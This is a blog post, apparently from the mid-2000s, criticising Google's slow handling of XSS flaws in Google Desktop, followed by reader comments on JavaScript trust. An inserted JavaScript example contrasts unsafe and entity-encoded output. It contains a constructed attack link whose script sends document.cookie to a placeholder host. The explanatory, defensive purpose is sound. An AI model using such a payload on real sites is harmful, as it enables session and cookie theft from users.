Trying google security again.

Well, the Google fix didn't fix all of the original issues I reported. I didn't mention them on the exploit page as they only apply to a few minority browsers, but they're there, so I'm trying security@google.com yet again, this time copying in two people at Google who got in touch.

Not that I hold out much hope: the Google security guy hasn't responded in the last 5 days to my simple request for how to actually report flaws, since the email address doesn't work (and I've heard from two other people who have had a similar lack of response after emailing them).

Hopefully Google will start responding and taking security reports seriously. I don't hold out much hope, but if the flaws that exist in Google Desktop are made public, Google won't be able to get them fixed in hours the way they can with a web site: Google Desktop is installed software, so people will be stuck with the old, flawed, exploitable versions they have now until they update. If you've still got Google Desktop, uninstall it now!

Oh, actually it looks like Salvatore Aranzulla has already publicised the Google Desktop flaw. Whilst not quite the same as the one I found, it comes from the same root cause: Google developers writing untrusted data from the query string straight into the page without encoding it, so anyone who can get a user to follow a crafted link gets their script run in the page's origin, in whatever browser the user happens to be using.
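To make that root cause concrete, here is an added example (not code from the original post, and not Google's or Google Desktop's code): a miniature page that echoes the search term from the query string back into its HTML, first the way the flaw works, then with the value entity-encoded before it is written out. The hostnames, the `q` parameter name and the attacker link are all constructed for the illustration.

```javascript
// Added example, not from the original post or from Google Desktop: the XSS
// root cause in miniature. Both renderers take a full URL and return the HTML
// fragment the page would emit for the "q" parameter (parameter name assumed).

// Minimal HTML entity encoder for the element-content (text) context.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function searchTerm(url) {
  // URLSearchParams percent-decodes, so the attacker's payload arrives
  // exactly as they typed it into the crafted link.
  return new URL(url).searchParams.get('q') || '';
}

// Vulnerable: the query-string value is concatenated into markup untouched.
function renderUnsafe(url) {
  return '<h2>Results for ' + searchTerm(url) + '</h2>';
}

// Hardened: the same value is entity-encoded before it goes into the page.
function renderSafe(url) {
  return '<h2>Results for ' + escapeHtml(searchTerm(url)) + '</h2>';
}

// Crude "did a script element get into the markup?" probe, enough for a
// regression test of this one sink; real testing loads the HTML in a browser.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed attacker link: the payload closes the heading and steals the
// document cookie. Both hostnames are placeholders.
const ATTACK_URL =
  'http://search.example.invalid/?q=' +
  encodeURIComponent(
    '</h2><script>document.location="http://evil.example.invalid/?c="+document.cookie</script>'
  );

// Constructed benign query containing a character that must still be encoded.
const BENIGN_URL = 'http://search.example.invalid/?q=Tom+%26+Jerry';

if (typeof require !== 'undefined' && typeof module !== 'undefined' && require.main === module) {
  console.log('unsafe:', renderUnsafe(ATTACK_URL));
  console.log('safe:  ', renderSafe(ATTACK_URL));
}
```

The encoder above is only correct for text placed between tags; a value written into an attribute, a `javascript:` URL or an inline script block needs the encoding for that context instead, which is why "encode on output, per context" rather than "strip bad characters on input" is the fix that actually holds up.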

Google, stop releasing products, get all your developers into a room, and get some good developers who understand security to explain it to everyone. Then review all your code and sites, get some tests written, get defensive and sort your security out now, before exploits actually start getting used. At the moment it's ridiculously easy to find exploits in Google's sites, and they don't seem to be taking it seriously.

Users: uninstall Google Desktop; make Google a "Restricted site" in IE so that script is disabled (Tools - Internet Options - Security - Restricted sites, and add *.google.com; note that this will also break Gmail and anything else on google.com that needs script); users of other browsers should do the equivalent; and start looking for different search or email solutions.

9 Responses to “Trying google security again.”

  1. Jim Ley Says:

    Puzzled_bear,

    I agree, if a site doesn't work without javascript it's broken, but even on the best authored sites their users like what javascript can offer. I've done some basic usability studies in this area, and they much prefer the minimised round-trips etc. So whilst I of course agree that they're broken if they don't work, that doesn't mean users are willing to forego those enhancements.

    You are obviously qualified to make the decision - you understand "javascript", which is more than most. The problems are twofold: users don't know that ebay.hackersite.com and ebay.com are different sites if they look the same - the success of phishers shows this - so following from that they equally won't know that "trust scripts from ebay.hackersite.com signed by Joe Hacker" isn't eBay asking. To make decisions you need to be aware of the consequences; the decision you're suggesting users make is, as far as they're concerned, "this site works" or "this site doesn't work" - they're going to choose works, because they don't know enough of the risks.

    Next we have the problem of XSS insertion flaws (or why the Google Desktop flaw is a problem) - here, the users will trust Google, they'll have ticked all the trust boxes, which is why XSS removes the ability of even the conscientious to choose who to trust. Signed scripts could maybe solve the XSS problems (but I can think of no reasonable way to sign script in an intrinsic event), but they're incompatible with all the current server solutions - the loss of the ability to sign dynamic scripts being the problem. For these reasons the solutions you propose are so long term as to be, to me, just a pipe dream, and we should focus on what can be achieved today.

  2. puzzled_bear Says:

    Anybody with an iota of security cluefulness isn't using IE and has javascript disabled already. Those that are browsing the web with script-enabled IE, well, Google is the least of their problems.

  3. Asbjørn Ulsberg Says:

    Thanks for warning me. Google Desktop is hereby uninstalled.

  4. Jim Ley Says:

    puzzled_bear, the exploit doesn't just apply to IE, it applies to all script-capable user agents. You can be sitting there thinking Firefox or Safari is immune, but it's not; Google's letting the script run there too. The problem is Google's: if script gets in the page, the browser executes it, any browser.

  5. puzzled_bear Says:

    Jim, I know that and I think Google should fix the issue. I also think the javascript issue should be fixed on a permanent basis, by shipping UAs with script fully disabled by default.

    I assure you no browser I run executes script from anywhere other than installed components and extensions ;-)

  6. Jim Ley Says:

    Oh right, puzzled_bear, so your comments weren't really about IE, but about default-enabled scripting, something which applies to every script-capable UA - have you tried posting a Mozilla enhancement request about this?

    In any case, it will not work; javascript is too important to too many websites. All it will do is turn users to a browser that does enable javascript by default, or you're going to have to have some silly "X wants to execute script on this site" model, which doesn't work simply because users are not qualified to make those decisions.

  7. Charles Fairly Says:

    To think Brin and Page were once the darlings of the Internet!

  8. Evil Heretic Says:

    Google pioneered the eternal cookie which reported all the results of Google searches. But of course that was just for their own statistical aid in developing a better product for YOU, the dear valued customer.

    Google has not explained just exactly what its Gov't contracts for tracking and recording browser usage are. But of course confidentiality clauses in the contract don't allow for such revelation.

    Google has a desktop program that searches your computer and leaves the results around to be read by those who know how. But of course it’s a mere oversight in the very complex code.

    Google is one of the great Good Guys of the Internet. But of course.

  9. puzzled_bear Says:

    “javascript is too important to too many websites”

    If a site doesn’t offer basic functionality without javascript, it’s broken. period.

    “users are not qualified to make those decisions”

    I am, and I did long ago. If we need to digitally sign javascripts, only allow event handlers in document bodies and toggle a per-site “trust signed scripts from ${DOMAIN}” flag once; then I’m all for it. Allow lists could probably even be syndicated for proxies, content filters and home security products.

    Since 'users are stupid', there's probably no point in bothering with any of this. After all, the majority of browser based exploits rely on script and these are no problem, despite the web browser being ubiquitous on every desktop machine. A hole in Google's desktop search with its comparatively tiny number of installations, however, means the sky is falling.

    ** with apologies for the sarcasm, no offense intended **
